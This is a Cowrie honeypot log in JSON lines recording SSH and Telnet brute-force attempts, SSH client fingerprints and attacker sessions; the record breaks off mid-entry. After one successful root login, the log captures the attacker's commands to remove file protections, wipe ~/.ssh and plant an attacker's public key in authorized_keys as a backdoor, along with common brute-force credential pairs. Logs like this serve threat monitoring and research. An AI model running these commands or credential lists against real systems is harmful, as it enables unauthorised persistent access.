{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40467,"dst_ip":"1.2.3.4","dst_port":22,"session":"124a7156a29e","protocol":"ssh","message":"New connection: 212.227.235.229:40467 (1.2.3.4:22) [session: 124a7156a29e]","sensor":"my-vps","timestamp":"2025-08-31T07:26:46.595255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:26:47.930495Z","src_ip":"212.227.235.229","session":"124a7156a29e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:26:48.093722Z","src_ip":"212.227.235.229","session":"124a7156a29e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T07:26:57.183100Z","src_ip":"212.227.235.229","session":"124a7156a29e"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:58.375072Z","src_ip":"212.227.235.229","session":"124a7156a29e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44044,"dst_ip":"1.2.3.4","dst_port":22,"session":"01d18a76ad02","protocol":"ssh","message":"New connection: 212.227.235.229:44044 (1.2.3.4:22) [session: 01d18a76ad02]","sensor":"my-vps","timestamp":"2025-08-31T07:26:58.543603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:26:59.340618Z","src_ip":"212.227.235.229","session":"01d18a76ad02"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:26:59.506109Z","src_ip":"212.227.235.229","session":"01d18a76ad02"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:27:11.483238Z","src_ip":"212.227.235.229","session":"01d18a76ad02"}
{"eventid":"cowrie.session.closed","duration":"36.5","message":"Connection lost after 36.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:27:12.010731Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:27:12.014620Z","src_ip":"212.227.235.229","session":"01d18a76ad02"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":47438,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f96e6bdcd72","protocol":"ssh","message":"New connection: 102.210.148.92:47438 (1.2.3.4:22) [session: 8f96e6bdcd72]","sensor":"my-vps","timestamp":"2025-08-31T07:27:50.174493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:27:50.175465Z","src_ip":"102.210.148.92","session":"8f96e6bdcd72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:27:50.334399Z","src_ip":"102.210.148.92","session":"8f96e6bdcd72"}
{"eventid":"cowrie.login.failed","username":"infocare","password":"admin@123abc","message":"login attempt [infocare/admin@123abc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:27:51.010123Z","src_ip":"102.210.148.92","session":"8f96e6bdcd72"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:27:52.171136Z","src_ip":"102.210.148.92","session":"8f96e6bdcd72"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":60528,"dst_ip":"1.2.3.4","dst_port":22,"session":"f27d2d340628","protocol":"ssh","message":"New connection: 102.210.148.92:60528 (1.2.3.4:22) [session: f27d2d340628]","sensor":"my-vps","timestamp":"2025-08-31T07:29:05.445615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:29:05.446642Z","src_ip":"102.210.148.92","session":"f27d2d340628"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:29:05.623120Z","src_ip":"102.210.148.92","session":"f27d2d340628"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"12341234*","message":"login attempt [tempusr/12341234*] failed","sensor":"my-vps","timestamp":"2025-08-31T07:29:06.372596Z","src_ip":"102.210.148.92","session":"f27d2d340628"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:29:07.551876Z","src_ip":"102.210.148.92","session":"f27d2d340628"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":44416,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f0de547a7e1","protocol":"ssh","message":"New connection: 102.210.148.92:44416 (1.2.3.4:22) [session: 1f0de547a7e1]","sensor":"my-vps","timestamp":"2025-08-31T07:30:22.278126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:30:22.279066Z","src_ip":"102.210.148.92","session":"1f0de547a7e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:30:22.440050Z","src_ip":"102.210.148.92","session":"1f0de547a7e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55645,"dst_ip":"1.2.3.4","dst_port":23,"session":"49e809c79e2d","protocol":"telnet","message":"New connection: 212.227.235.229:55645 (1.2.3.4:23) [session: 49e809c79e2d]","sensor":"my-vps","timestamp":"2025-08-31T07:30:22.822141Z"}
{"eventid":"cowrie.login.failed","username":"username","password":"admin@12345","message":"login attempt [username/admin@12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:30:23.128265Z","src_ip":"102.210.148.92","session":"1f0de547a7e1"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:30:24.292588Z","src_ip":"102.210.148.92","session":"1f0de547a7e1"}
{"eventid":"cowrie.session.closed","duration":31.246028184890747,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:30:54.068084Z","src_ip":"212.227.235.229","session":"49e809c79e2d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56566,"dst_ip":"1.2.3.4","dst_port":22,"session":"45c8310fc535","protocol":"ssh","message":"New connection: 217.72.205.35:56566 (1.2.3.4:22) [session: 45c8310fc535]","sensor":"my-vps","timestamp":"2025-08-31T07:30:59.136747Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:30:59.137956Z","src_ip":"217.72.205.35","session":"45c8310fc535"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":64779,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b0e59e71227","protocol":"ssh","message":"New connection: 79.127.48.196:64779 (1.2.3.4:22) [session: 6b0e59e71227]","sensor":"my-vps","timestamp":"2025-08-31T07:31:23.194528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:31:35.027385Z","src_ip":"79.127.48.196","session":"6b0e59e71227"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:31:35.028370Z","src_ip":"79.127.48.196","session":"6b0e59e71227"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":51278,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ef841c63f0a","protocol":"ssh","message":"New connection: 102.210.148.92:51278 (1.2.3.4:22) [session: 2ef841c63f0a]","sensor":"my-vps","timestamp":"2025-08-31T07:31:38.081352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:31:38.082357Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:31:38.248323Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:31:38.955555Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:31:39.303826Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:31:39.304564Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:31:39.305429Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:31:39.472769Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:31:40.305865Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T07:31:40.306550Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T07:31:40.475272Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:31:40.476166Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":51290,"dst_ip":"1.2.3.4","dst_port":22,"session":"1085ee467212","protocol":"ssh","message":"New connection: 102.210.148.92:51290 (1.2.3.4:22) [session: 1085ee467212]","sensor":"my-vps","timestamp":"2025-08-31T07:31:40.662461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:31:40.663368Z","src_ip":"102.210.148.92","session":"1085ee467212"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:31:40.838646Z","src_ip":"102.210.148.92","session":"1085ee467212"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T07:31:41.580795Z","src_ip":"102.210.148.92","session":"1085ee467212"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:31:42.758955Z","src_ip":"102.210.148.92","session":"1085ee467212"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":51296,"dst_ip":"1.2.3.4","dst_port":22,"session":"d513c42efe36","protocol":"ssh","message":"New connection: 102.210.148.92:51296 (1.2.3.4:22) [session: d513c42efe36]","sensor":"my-vps","timestamp":"2025-08-31T07:31:42.935382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:31:42.936020Z","src_ip":"102.210.148.92","session":"d513c42efe36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-